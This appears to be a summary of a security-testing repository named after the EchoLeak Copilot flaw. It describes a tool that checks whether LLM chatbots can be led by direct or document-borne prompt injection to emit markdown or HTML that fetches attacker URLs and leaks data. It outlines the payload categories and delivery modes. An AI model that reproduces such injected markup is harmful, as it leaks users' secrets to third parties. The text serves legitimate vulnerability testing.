EchoLeak: AI command injection in Microsoft 365 Copilot

This repository is a real offensive security testing tool rather than a simple detector or README-only project. It is a Node.js CLI utility named valtik-markdown-exfil-tester that targets the markdown/HTML exfiltration class affecting LLM-backed chatbots, especially where prompt injection causes the model to emit renderable markdown or HTML that triggers browser-side fetches. The core capability is to prove whether a chatbot/frontend combination can be induced to fetch attacker-controlled URLs and leak marker data through query parameters. Repository structure is compact and modular. The main entry point is src/cli.js, which parses arguments, starts the local sink, loads payloads, optionally launches Playwright, delivers payloads, renders responses, classifies results, and prints reports. src/sink.js implements a localhost-only HTTP listener on 127.0.0.1 with a random or user-specified port; it records request metadata including path, query, headers, referer, IP, and user-agent. src/browser.js wraps Playwright Chromium to render arbitrary HTML/markdown and capture outbound and failed requests, enabling distinction between successful fetches and blocked attempts. src/classify.js correlates sink hits, browser requests, failed requests, and LLM response text to classify each payload as confirmed, browser-tried, llm-emitted, refused, or inconclusive. Delivery logic is split into two modes. src/deliver/direct.js performs direct POST submission to a chatbot endpoint using several common API request shapes: OpenAI-style chat completions, Anthropic-style messages, simple JSON message/prompt bodies, and form-encoded q=. It extracts response text heuristically from multiple common JSON response formats or SSE/plain text. src/deliver/indirect-doc.js supports indirect prompt injection by generating markdown documents containing payloads, writing them to disk for later upload into a target knowledge base, RAG source, support system, or similar ingestion path, then waiting for sink hits tagged with the payload ID. The payload library in src/payloads/library.json is the main exploit content. It contains a broad set of render-side exfil vectors: markdown images, reference-style links and images, raw HTML img tags, srcset, SVG image href/xlink, iframe, object, embed/media-related tags, form-related vectors, and prompt-wrapped social-engineering payloads that explicitly instruct the LLM to reproduce the malicious markup. Templates substitute a sink URL, sink host, payload ID, and a placeholder secret token (SECRET_PROBE). This makes the tool operational rather than a bare PoC, though payload customization is still relatively simple and local. Notable network/target behavior: the tool does not hardcode an external attacker server; instead it creates a local HTTP sink at 127.0.0.1:<port> and points payloads there for correlation. The actual remote target is user-supplied as <chatbot-url> and optionally --endpoint. In direct mode it sends POST requests to the target endpoint. In browser-assisted mode it renders returned content locally and observes whether the browser attempts to fetch the sink URL. The tool also records referer values, which can help demonstrate what page or thread triggered the exfil attempt. Overall, this repository is best characterized as an operational black-box exploit/testing harness for browser-mediated markdown/HTML exfiltration in LLM chatbot ecosystems. It is not malware and does not steal real secrets by default, but it is clearly exploit-oriented: it automates payload delivery, render-side triggering, network capture, and severity classification for a known vulnerability class associated with CVE-2025-32711 and similar issues.